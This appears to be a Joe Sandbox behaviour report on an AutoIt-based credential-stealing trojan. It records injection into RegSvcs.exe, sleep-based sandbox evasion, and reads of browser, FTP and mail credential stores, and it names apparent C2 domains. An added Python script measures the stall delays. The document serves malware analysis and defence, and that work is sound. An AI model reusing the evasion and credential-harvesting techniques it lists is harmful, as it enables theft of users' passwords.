                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> API/Special instruction interceptor: Address: 18BA6BC
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: FD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: 28F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: 2350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: 25D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Memory allocated: 2350000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Window / User API: threadDelayed 7594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Window / User API: threadDelayed 2271
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Evaded block: after key decision (graph_0-94928)
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-95611)
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> API coverage: 4.4 %
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe TID: 2184 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe TID: 4396 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00976CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0097EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0097F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0097F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00981B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00981C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00981F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0094DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Thread delayed: 50 consecutive sleeps, each roughly 109 ms shorter than the one before: 100000, 99874, 99765, 99656, 99546, 99437, 99328, 99218, 99109, 98999, 98890, 98781, 98671, 98562, 98452, 98343, 98234, 98124, 98015, 97906, 97796, 97687, 97578, 97467, 97359, 97249, 97140, 97029, 96921, 96812, 96693, 96562, 96450, 96340, 96201, 96093, 95984, 95875, 95765, 95656, 95546, 95437, 95328, 95218, 95109, 94999, 94889, 94780, 94670, 94553
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Thread delayed: delay time: 922337203685477 (2 events)
Source: SOA_9828392091.exe, 00000000.00000002.2125246358.00000000017DB000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: vmwareworkstation.exe
Source: RegSvcs.exe, 00000002.00000002.4578860630.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> API call chain: ExitProcess graph end node (graph_0-95258)
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> API call chain: ExitProcess graph end node (graph_0-94089)
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> API call chain: ExitProcess graph end node (graph_0-94528)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Code function: 2_2_0613B410 LdrInitializeThunk
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00986AAF BlockInput
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00933D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00963920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00A55F70 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_018B92F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_018BA988 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_018BA928 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0096A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00958189 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Memory allocated: page read and write | page guard
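The "Thread delayed" entries in this section are the ones worth quantifying before deciding how long a detonation needs to run. 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, so those waits never return within any analysis window, and the fifty RegSvcs.exe sleeps that shrink from 100000 ms to 94553 ms add up to about 81 minutes of stalling, longer than a typical default sandbox timeout. The script below is an added example and not part of the Joe Sandbox report: it parses delay lines in the shape the report's text export uses (path and event run together, trailing link text), separates the effectively infinite waits from finite sleeps a sandbox could skip, and sizes the finite ones. The sample lines and the delay list are copied from this report; the parsing regex, the process-name handling and the summary fields are this example's own.

```python
"""Size the stalling behaviour recorded in a Joe Sandbox 'Thread delayed' list."""
import re

# 922337203685477 ms is TimeSpan.MaxValue in milliseconds: a wait of that length
# never returns in practice, so it is an infinite sleep rather than a delay that
# sleep-skipping could fast-forward.
INFINITE_MS = 922_337_203_685_477

# Constructed input: five lines copied from the report, in the raw shape the text
# export produces (the path runs straight into the event, "Jump to behavior" trails).
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99874Jump to behavior
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe TID: 2184Thread sleep time: -922337203685477s >= -30000sJump to behavior
"""

# The 50 finite RegSvcs.exe delays listed in the report, in the order reported.
REGSVCS_DELAYS_MS = [
    100000, 99874, 99765, 99656, 99546, 99437, 99328, 99218, 99109, 98999,
    98890, 98781, 98671, 98562, 98452, 98343, 98234, 98124, 98015, 97906,
    97796, 97687, 97578, 97467, 97359, 97249, 97140, 97029, 96921, 96812,
    96693, 96562, 96450, 96340, 96201, 96093, 95984, 95875, 95765, 95656,
    95546, 95437, 95328, 95218, 95109, 94999, 94889, 94780, 94670, 94553,
]

# The path ends at the first ".exe"; anything between it and "Thread" (a TID,
# a separator, nothing at all) is skipped, and the "s" unit on sleep lines is ignored.
_LINE = re.compile(
    r"Source: (?P<proc>.+?\.exe).*?Thread (?:delayed: delay time|sleep time): (?P<ms>-?\d+)"
)


def parse_delays(text):
    """Return (process basename, milliseconds) for every delay line in text."""
    out = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            proc = m.group("proc").replace("/", "\\").rsplit("\\", 1)[-1]
            out.append((proc, abs(int(m.group("ms")))))
    return out


def longest_decreasing_run(values):
    """Length of the longest run of strictly decreasing consecutive values."""
    best = run = 1 if values else 0
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if cur < prev else 1
        best = max(best, run)
    return best


def stall_budget(delays_ms):
    """Split effectively infinite waits from finite sleeps and size the finite ones,
    which is what a real victim host would actually wait through."""
    finite = [d for d in delays_ms if d < INFINITE_MS]
    return {
        "infinite_waits": len(delays_ms) - len(finite),
        "finite_sleeps": len(finite),
        "finite_total_ms": sum(finite),
        "finite_total_min": round(sum(finite) / 60_000, 1),
        "longest_decreasing_run": longest_decreasing_run(finite),
    }


def report(text):
    """Per-process stall summary for a block of report lines."""
    per_proc = {}
    for proc, ms in parse_delays(text):
        per_proc.setdefault(proc, []).append(ms)
    return {proc: stall_budget(ms_list) for proc, ms_list in per_proc.items()}


if __name__ == "__main__":
    for proc, summary in report(SAMPLE_LINES).items():
        print(proc, summary)
    print("RegSvcs.exe finite sleeps", stall_budget(REGSVCS_DELAYS_MS))
```

The longest decreasing run is reported separately because a long sequence of near-identical sleeps that each end slightly earlier than the last is a different signal from one very long sleep: the former keeps the process alive and responsive to timing checks for the whole stall, so shortening the sandbox clock does not collapse it the way a single Sleep() call would.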

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 81D008
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0096B106 LogonUserW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00933D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0097411C SendInput,keybd_event
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009774BB mouse_event
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SOA_9828392091.exe"
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0096A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: SOA_9828392091.exe -> Binary or memory string: Shell_TrayWnd
Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp -> Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009565C4 cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (3 events)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation (3 events)
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation (3 events)
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0098091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_009AB340 GetUserNameW
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_00961E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\SOA_9828392091.exe -> Code function: 0_2_0094DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match -> File source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE
Source: Yara match -> File source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match -> File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -> File source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match -> File source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -> File source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR
Source: Yara match -> File source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 events)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -> Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: SOA_9828392091.exe -> Binary or memory string: WIN_81
Source: SOA_9828392091.exe -> Binary or memory string: WIN_XP
Source: SOA_9828392091.exe, 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp -> Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: SOA_9828392091.exe -> Binary or memory string: WIN_XPe
Source: SOA_9828392091.exe -> Binary or memory string: WIN_VISTA
Source: SOA_9828392091.exe -> Binary or memory string: WIN_7
Source: SOA_9828392091.exe -> Binary or memory string: WIN_8
Source: Yara match -> File source: 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -> File source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 0.2.SOA_9828392091.exe.22c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SOA_9828392091.exe.22c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SOA_9828392091.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 968, type: MEMORYSTR
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_00988C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 0_2_00988C4F
Source: C:\Users\user\Desktop\SOA_9828392091.exe | Code function: 0_2_0098923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_0098923B
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts3
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                21
                Obfuscated Files or Information
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                11
                Software Packing
                NTDS138
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                1
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                11
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder
                11
                Masquerading
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Hidden Files and Directories
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Source | Detection | Scanner | Label
SOA_9828392091.exe | 39% | ReversingLabs | Win32.Trojan.AutoitInject
SOA_9828392091.exe | 28% | Virustotal |
SOA_9828392091.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe | 0% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
palumalimited.com | 4% | Virustotal |
mail.palumalimited.com | 5% | Virustotal |
Source | Detection | Scanner | Label
http://mail.palumalimited.com | 0% | Avira URL Cloud | safe
https://wixxOvts0RfcEfM.org | 0% | Avira URL Cloud | safe
